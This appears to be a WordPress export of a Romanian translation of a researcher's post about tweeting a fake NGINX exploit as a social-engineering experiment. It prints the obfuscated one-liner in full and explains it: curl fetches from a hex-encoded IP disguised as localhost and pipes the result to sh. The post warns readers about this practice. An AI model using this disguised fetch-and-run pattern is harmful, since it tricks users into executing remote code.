{"id":35126,"date":"2019-10-31T22:02:28","date_gmt":"2019-10-31T19:02:28","guid":{"rendered":"https:\/\/prohoster.info\/blog\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx\/"},"modified":"2019-10-31T22:02:28","modified_gmt":"2019-10-31T19:02:28","slug":"uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx","status":"publish","type":"post","link":"https:\/\/prohoster.info\/ro\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx","title":{"rendered":"Succesul experimentului social cu exploit fals pentru nginx","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<p><i><b>Nota traduc\u0103torului.<\/b>: <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/notdan\">Autor<\/a><\/noindex> Not\u0103 original\u0103, publicat\u0103 pe 1 iunie, a decis s\u0103 efectueze un experiment \u00een r\u00e2ndul celor interesa\u021bi de securitatea informa\u021bional\u0103. Pentru aceasta, a preg\u0103tit un exploit fals pentru o vulnerabilitate necunoscut\u0103 \u00eentr-un server web \u0219i l-a postat pe Twitter. Presupunerile sale - de a fi imediat demascat de speciali\u0219ti, care vor observa dezinformarea evident\u0103 \u00een cod - nu s-au confirmat... Au dep\u0103\u0219it toate a\u0219tept\u0103rile, chiar \u00een sens invers: tweet-ul a primit un suport uria\u0219 din partea numero\u0219ilor oameni care nu s-au deranjat s\u0103 verifice con\u021binutul acestuia.<\/i><\/p>\n<p><img decoding=\"async\" alt=\"Succesul experimentului social cu exploit fals pentru nginx\" src=\"\/wp-content\/uploads\/2019\/06\/20ff08c6f541176c68ef2c689b989389.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\n<b>TL;DR: cu niciun chip nu folosi\u021bi pipelining-ul fi\u0219ierelor \u00een sh sau bash. Este o modalitate excelent\u0103 de a-\u021bi pierde controlul asupra calculatorului.<\/b><noindex><a rel=\"nofollow\" name=\"habracut\"><\/a><\/noindex><\/p>\n<p>Vreau s\u0103 \u00eemp\u0103rt\u0103\u0219esc cu voi o mic\u0103 poveste despre un PoC-exploit glume\u021b, care a fost creat pe 31 mai. Acesta a ap\u0103rut rapid ca r\u0103spuns la vestea de la <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/alisaesage\">Alisa Esage \u0218evcenko<\/a><\/noindex>, membru <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/thezdi\">Zero Day Initiative<\/a><\/noindex> (ZDI), despre faptul c\u0103 \u00een cur\u00e2nd va fi dezv\u0103luit\u0103 informa\u021bia despre o vulnerabilitate \u00een NGINX, care duce la RCE (execu\u021bia de cod de la distan\u021b\u0103). Deoarece NGINX st\u0103 la baza multor site-uri web, vestea ar fi trebuit s\u0103 aib\u0103 un impact de bomb\u0103. Dar din cauza \u00eent\u00e2rzierilor \u00een procesul de \u201edezv\u0103luire responsabil\u0103\u201d a informa\u021biilor, detaliile \u00eent\u00e2mpl\u0103rii nu au fost cunoscute - aceasta este procedura standard ZDI.<\/p>\n<p><img decoding=\"async\" alt=\"Succesul experimentului social cu exploit fals pentru nginx\" src=\"\/wp-content\/uploads\/2019\/06\/fba47177ff2a2d05db7942f229e145b0.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<i><noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/alisaesage\/status\/1134400951043874816\">Tweet<\/a><\/noindex> despre dezv\u0103luirea unei vulnerabilit\u0103\u021bi \u00een NGINX<\/i><\/p>\n<p>Termin\u00e2nd lucrul la o nou\u0103 tehnic\u0103 de obfuscare \u00een curl, am citat tweet-ul original \u0219i am \u201escurs un PoC\u201d de lucru, const\u00e2nd dintr-o singur\u0103 linie de cod, care pretindea c\u0103 folose\u0219te vulnerabilitatea descoperit\u0103. Desigur, acesta era complet fals. Credeam c\u0103 voi fi demascat imediat \u0219i c\u0103, \u00een cel mai bun caz, voi primi c\u00e2teva retweeturi (bine \u0219i at\u00e2t).<\/p>\n<p><img decoding=\"async\" alt=\"Succesul experimentului social cu exploit fals pentru nginx\" src=\"\/wp-content\/uploads\/2019\/06\/30c8394a4bd7a151828bc3459f18f2f6.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<i><noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/notdan\/status\/1134559331989434368\">Tweet<\/a><\/noindex> cu un exploit fals<\/i><\/p>\n<p>Cu toate acestea, nu am putut s\u0103-mi imaginez ce a urmat. Popularitatea tweet-ului meu a explodat. Uimitor, dar p\u00e2n\u0103 \u00een acest moment (15:00 MSK 1 iunie) pu\u021bini \u0219i-au dat seama c\u0103 este o fars\u0103. Mul\u021bi \u00eel retweet-eaz\u0103 f\u0103r\u0103 nicio verificare (nu mai vorbim de aprecierea graficii frumoase ASCII pe care o afi\u0219eaz\u0103).<\/p>\n<p><img decoding=\"async\" alt=\"Succesul experimentului social cu exploit fals pentru nginx\" src=\"\/wp-content\/uploads\/2019\/06\/a22501843edc07cf0dc49b698b1048c2.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<i>Uita\u021bi-v\u0103 ce frumuse\u021be!<\/i><\/p>\n<p>De\u0219i toate aceste cicluri \u0219i culori sunt remarcabile, este evident c\u0103 pentru a le vedea, oamenii au executat codul pe ma\u0219inile lor. Din fericire, browserele func\u021bioneaz\u0103 similar, iar av\u00e2nd \u00een vedere c\u0103 problemele legale nu m\u0103 intereseaz\u0103, codul ascuns pe site-ul meu nu f\u0103cea dec\u00e2t s\u0103 efectueze apeluri echo, f\u0103r\u0103 a \u00eencerca s\u0103 instaleze sau s\u0103 execu\u021bi orice alt cod suplimentar.<\/p>\n<p>O mic\u0103 deviere: <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/netspooky\">netspooky<\/a><\/noindex>, <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/dnoiz1\">dnz<\/a><\/noindex>, eu \u0219i ceilal\u021bi b\u0103ie\u021bi din echip\u0103 <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/thugcrowd\">Thugcrowd<\/a><\/noindex> ne juc\u0103m de ceva vreme cu diferite metode de obfuscare a comenzilor curl, pentru c\u0103 este amuzant... \u0219i suntem geeks. netspooky \u0219i dnz au descoperit c\u00e2teva metode noi care mi s-au p\u0103rut extrem de promi\u021b\u0103toare. M-am al\u0103turat distrac\u021biei \u0219i am \u00eencercat s\u0103 adaug conversii IP zecimale la setul de trucuri. Se pare c\u0103 IP-urile pot fi, de asemenea, convertite \u00een format hexadecimal. Mai mult, curl \u0219i majoritatea altor instrumente NIX accept\u0103 cu pl\u0103cere IP-urile hexadecimale! Astfel, a fost nevoie doar s\u0103 creez un prompt de comand\u0103 credibil \u0219i care s\u0103 arate sigur. \u00cen cele din urm\u0103 m-am oprit asupra urm\u0103toarei:<\/p>\n<pre><code class=\"plaintext\">curl -gsS https:\/\/127.0.0.1-OR-VICTIM-SERVER:443\/..\/..\/..\/\/nginx-handler?\/usr\/lib\/nginx\/modules\/ngx_stream_module.so:127.0.0.1:80:\/bin\/sh&lt;&#039;protocol:TCP&#039; -O 0x0238f06a#PLToffset |sh; nc \/dev\/tcp\/localhost<\/code><\/pre>\n<p><\/p>\n<h2>Ingineria socio-electronic\u0103 (S.E.E.) este mai mult dec\u00e2t un simplu phishing<\/h2>\n<p>\nSecuritatea \u0219i familiaritatea au fost esen\u021biale \u00een cadrul acestui experiment. Cred c\u0103 acestea au dus la succesul s\u0103u. Promptul de comand\u0103 sugera clar securitate, referindu-se la \u201e127.0.0.1\u201d (cunoscutul localhost). Se consider\u0103 c\u0103 localhost este sigur \u0219i c\u0103 datele de acolo nu p\u0103r\u0103sesc niciodat\u0103 computerul t\u0103u.<\/p>\n<p>Familiaritatea a fost al doilea component cheie S.E.E. al experimentului. Deoarece publicul \u021bint\u0103 era format \u00een principal din persoane familiarizate cu conceptele de baz\u0103 ale securit\u0103\u021bii computerelor, a fost important s\u0103 cre\u0103m un cod a c\u0103rui p\u0103r\u021bi p\u0103reau familiare \u0219i obi\u0219nuite (\u0219i deci sigure). \u00cemprumutarea elementelor din vechile concepte de exploatare \u0219i combinarea acestora \u00eentr-un mod neobi\u0219nuit s-a dovedit a fi foarte reu\u0219it\u0103.<\/p>\n<p>Mai jos este un detaliat descompus al comenzii de tip one-liner. <i>Tot ce este \u00een aceast\u0103 list\u0103 este <b>cosmetic<\/b>, iar pentru a func\u021biona cu adev\u0103rat, practic nu este necesar nimic.<\/i><\/p>\n<p>Ce componente sunt cu adev\u0103rat necesare? Acestea sunt <code>-gsS<\/code>, <code>-O 0x0238f06a<\/code>, <code>|sh<\/code> \u0219i serverul web. Serverul web nu con\u021binea instruc\u021biuni mali\u021bioase, ci doar transmitea grafic\u0103 ASCII prin comenzi <code>echo<\/code> \u00een scriptul con\u021binut \u00een <code>index.html<\/code>. C\u00e2nd utilizatorul introducea un \u0219ir cu <code>|sh<\/code> \u00een mijloc, <code>index.html<\/code> se \u00eenc\u0103rca \u0219i se executa. Din fericire, \u00eengrijitorii serverului web nu aveau inten\u021bii rele.<\/p>\n<ul>\n<li> <code>..\/..\/..\/%00<\/code> \u2014 ilustreaz\u0103 ie\u0219irea din director;<\/li>\n<li> <code>ngx_stream_module.so<\/code> \u2014 calea c\u0103tre un modul NGINX aleatoriu;<\/li>\n<li> <code>\/bin\/sh%00&lt;'protocol:TCP'<\/code> \u2014 se presupune c\u0103 rul\u0103m <code>\/bin\/sh<\/code> pe ma\u0219ina \u021bint\u0103 \u0219i redirec\u021bion\u0103m ie\u0219irea c\u0103tre un canal TCP;<\/li>\n<li> <code>-O 0x0238f06a#PLToffset<\/code> \u2014 ingredientul secret, completat <code>#PLToffset<\/code>, pentru a ar\u0103ta ca un offset de memorie, con\u021bin\u00e2nd \u00eentr-un fel \u00een PLT;<\/li>\n<li> <code>|sh;<\/code> \u2014 un alt fragment important. Trebuia s\u0103 redirec\u021bion\u0103m ie\u0219irea c\u0103tre sh\/bash pentru a executa codul venit de la serverul web atacator, situat la <code>0x0238f06a<\/code> (<code>2.56.240.x<\/code>);<\/li>\n<li> <code>nc \/dev\/tcp\/localhost<\/code> \u2014 un fals, \u00een care netcat face referire la <code>\/dev\/tcp\/localhost<\/code>, pentru ca totul s\u0103 par\u0103 din nou sigur. De fapt, nu face nimic \u0219i este inclus \u00een \u0219ir pentru estetic\u0103.<\/li>\n<\/ul>\n<p>\nAici se \u00eencheie decriptarea unui script pe o linie \u0219i discu\u021bia despre aspectele \u201eingineriei socio-electronice\u201d (phishing sofisticat).<\/p>\n<h2>Configurarea serverului web \u0219i m\u0103suri de contracarare<\/h2>\n<p>\nDeoarece majoritatea dintre urm\u0103ritorii mei sunt speciali\u0219ti \u00een securitatea informa\u021biilor\/hackeri, am decis s\u0103 fac serverul web pu\u021bin mai rezistent la \u201einteresele\u201d lor, doar pentru a le oferi ceva de f\u0103cut (\u0219i era distractiv s\u0103-l configurez). Nu am de g\u00e2nd s\u0103 enum\u0103r toate capcanele, deoarece experimentul este \u00eenc\u0103 \u00een desf\u0103\u0219urare, dar iat\u0103 c\u00e2teva lucruri pe care serverul le face:<\/p>\n<ul>\n<li> Monitorizeaz\u0103 activ \u00eencerc\u0103rile de distribuire pe anumite re\u021bele sociale \u0219i introduce diverse miniaturi de previzualizare pentru a \u00eencuraja utilizatorul s\u0103 acceseze linkul.<\/li>\n<li> Redirec\u021bioneaz\u0103 Chrome\/Mozilla\/Safari\/etc. c\u0103tre un videoclip promo\u021bional Thugcrowd \u00een loc s\u0103 arate scriptul shell.<\/li>\n<li> Monitorizeaz\u0103 SEMNELE EXPLICITE de intruziune\/atac, dup\u0103 care \u00eencepe s\u0103 redirec\u021bioneze cererile c\u0103tre serverele NSA (ha!).<\/li>\n<li> Instaleaz\u0103 un troian \u0219i, de asemenea, un rootkit BIOS pe toate computerele ale c\u0103ror utilizatori viziteaz\u0103 hostul dintr-un browser obi\u0219nuit (glum\u0103!).<\/li>\n<\/ul>\n<p>\n<img decoding=\"async\" alt=\"Succesul experimentului social cu exploit fals pentru nginx\" src=\"\/wp-content\/uploads\/2019\/06\/8ea3f0c6e2e303bef6f9ba73370d6cf1.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<i>O mic\u0103 parte a antimateriei<\/i><\/p>\n<p>\u00cen acest caz, singurul meu scop a fost s\u0103 \u00eenv\u0103\u021b despre unele capabilit\u0103\u021bi Apache \u2014 \u00een special, reguli interesante de redirec\u021bionare a cererilor \u2014 \u0219i m-am g\u00e2ndit: de ce nu?<\/p>\n<h2>Exploit NGINX (adev\u0103rat!)<\/h2>\n<p>\nAbona\u021bi-v\u0103 la <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/alisaesage\">@alisaesage<\/a><\/noindex> pe Twitter \u0219i urm\u0103re\u0219te lucr\u0103rile remarcabile ale ZDI \u00een remedierea unor vulnerabilit\u0103\u021bi reale \u0219i oportunit\u0103\u021bi de exploatare \u00een NGINX. Munca lor m-a fascinat\u0103 \u00eentotdeauna \u0219i sunt recunosc\u0103tor Alisei pentru r\u0103bdarea ar\u0103tat\u0103 fa\u021b\u0103 de toate men\u021biunile \u0219i notific\u0103rile cauzate de tweet-ul meu prostesc. Din fericire, a adus \u0219i unele beneficii: a ajutat la cre\u0219terea con\u0219tientiz\u0103rii cu privire la vulnerabilit\u0103\u021bile NGINX, precum \u0219i la problemele cauzate de abuzul de curl.<br \/>\n<br \/>Sursa: <a content=\"nofollow\" rel=\"nofollow\" href=\"https:\/\/habr.com\/ru\/company\/flant\/blog\/454700\/\">habr.com<\/a><\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>\u041f\u0440\u0438\u043c. \u043f\u0435\u0440\u0435\u0432.: \u0410\u0432\u0442\u043e\u0440 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u043e\u0439 \u0437\u0430\u043c\u0435\u0442\u043a\u0438, \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u043e\u0439 1 \u0438\u044e\u043d\u044f, \u0440\u0435\u0448\u0438\u043b \u043f\u0440\u043e\u0432\u0435\u0441\u0442\u0438 \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442 \u0432 \u0441\u0440\u0435\u0434\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u0443\u044e\u0449\u0438\u0445\u0441\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u044e. \u0414\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u043e\u043d \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u0438\u043b \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043a \u043d\u0435\u0440\u0430\u0441\u043a\u0440\u044b\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0438 \u0440\u0430\u0437\u043c\u0435\u0441\u0442\u0438\u043b \u0435\u0433\u043e \u0432 \u0441\u0432\u043e\u0451\u043c \u0442\u0432\u0438\u0442\u0442\u0435\u0440\u0435. \u0415\u0433\u043e \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u2014 \u0431\u044b\u0442\u044c \u043c\u0433\u043d\u043e\u0432\u0435\u043d\u043d\u043e \u0440\u0430\u0437\u043e\u0431\u043b\u0430\u0447\u0451\u043d\u043d\u044b\u043c \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u0430\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0443\u0432\u0438\u0434\u044f\u0442 \u043e\u0447\u0435\u0432\u0438\u0434\u043d\u044b\u0439 \u043e\u0431\u043c\u0430\u043d \u0432 \u043a\u043e\u0434\u0435, \u2014 \u043d\u0435 \u043f\u0440\u043e\u0441\u0442\u043e \u043d\u0435 \u043e\u043f\u0440\u0430\u0432\u0434\u0430\u043b\u0438\u0441\u044c\u2026 \u041e\u043d\u0438 \u043f\u0440\u0435\u0432\u0437\u043e\u0448\u043b\u0438 \u0432\u0441\u0435 \u043e\u0436\u0438\u0434\u0430\u043d\u0438\u044f, [&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":1,"featured_media":26410,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[688],"tags":[],"class_list":["post-35126","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-administrirovanie"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 5.0.2.1 - aioseo.com -->\n\t<meta name=\"description\" content=\"\u041f\u0440\u0438\u043c.\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Yuri Gagarin\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/ro\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 5.0.2.1\" \/>\n\t\t<meta property=\"og:locale\" content=\"ro_RO\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47\u0423\u0441\u043f\u0435\u0445 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0430 \u0441 \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u043c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c \u0434\u043b\u044f nginx | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"\u041f\u0440\u0438\u043c.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/ro\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2019-10-31T19:02:28+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2019-10-31T19:02:28+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47Succesul experimentului social cu exploatul fals pentru nginx | ProHoster","description":"Not\u0103.","canonical_url":"https:\/\/prohoster.info\/ro\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"ro_RO","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47\u0423\u0441\u043f\u0435\u0445 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0430 \u0441 \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u043c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c \u0434\u043b\u044f nginx | ProHoster","og:description":"\u041f\u0440\u0438\u043c.","og:url":"https:\/\/prohoster.info\/ro\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2019-10-31T19:02:28+00:00","article:modified_time":"2019-10-31T19:02:28+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster","article:author":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":{"post_id":"35126","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":null,"schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"seo_analyzer_scan_date":"2026-01-21 21:57:20","breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"ai":null,"created":"2021-02-28 22:59:48","updated":"2026-01-21 21:57:20","focus_keyword":null,"additional_keywords":null,"truseo_locale":null},"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/ro\/wp-json\/wp\/v2\/posts\/35126","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/ro\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/ro\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/ro\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/ro\/wp-json\/wp\/v2\/comments?post=35126"}],"version-history":[{"count":0,"href":"https:\/\/prohoster.info\/ro\/wp-json\/wp\/v2\/posts\/35126\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/prohoster.info\/ro\/wp-json\/wp\/v2\/media\/26410"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/ro\/wp-json\/wp\/v2\/media?parent=35126"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/ro\/wp-json\/wp\/v2\/categories?post=35126"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/ro\/wp-json\/wp\/v2\/tags?post=35126"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}